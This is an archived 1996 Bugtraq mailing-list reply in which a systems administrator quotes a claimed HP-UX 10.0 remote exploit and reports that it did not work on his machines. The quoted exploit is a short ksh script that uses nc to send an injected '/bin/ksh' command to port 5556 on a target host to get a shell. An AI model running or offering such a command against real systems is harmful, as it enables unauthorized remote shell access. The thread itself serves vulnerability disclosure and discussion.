Bugtraq mailing list archives

Re: BoS: SOD remote exploit

From: emf () pls com (Erik Fichtner)
Date: Mon, 14 Oct 1996 13:43:43 -0400


Julian Assange wrote:


#!/bin/ksh
echo ' 11T ;/bin/ksh' | nc $1 5556
# Yup, that's it.  That's the hole.. Believe it.

HP-UX 10.0,
haven't tested it personally.


I tried this a couple weeks ago when the SOD folks started publicizing
their web page and supposed exploits..


it didnt work.. theres no deamon listening on that port on any of our
9 or 10 hpux systems.   So, it's nothing that a default install by a
HPUX-clueless admin such as myself installs.

Anyone know what this port 5556 belongs to?  /etc/services doesnt
have an entry for it.

be nice to know what this belonged to so it doesnt accidentally get
installed.


--
Erik Fichtner           Systems Administrator, PLS              emf () pls com
                        'Your agonizer, please...'

Current thread:

BoS: SOD remote exploit Julian Assange (Oct 12)
- <Possible follow-ups>
- Re: BoS: SOD remote exploit Erik Fichtner (Oct 14)
  - Re: BoS: SOD remote exploit Helmut Springer (Oct 14)
  - Re: BoS: SOD remote exploit David Schwartz (Oct 14)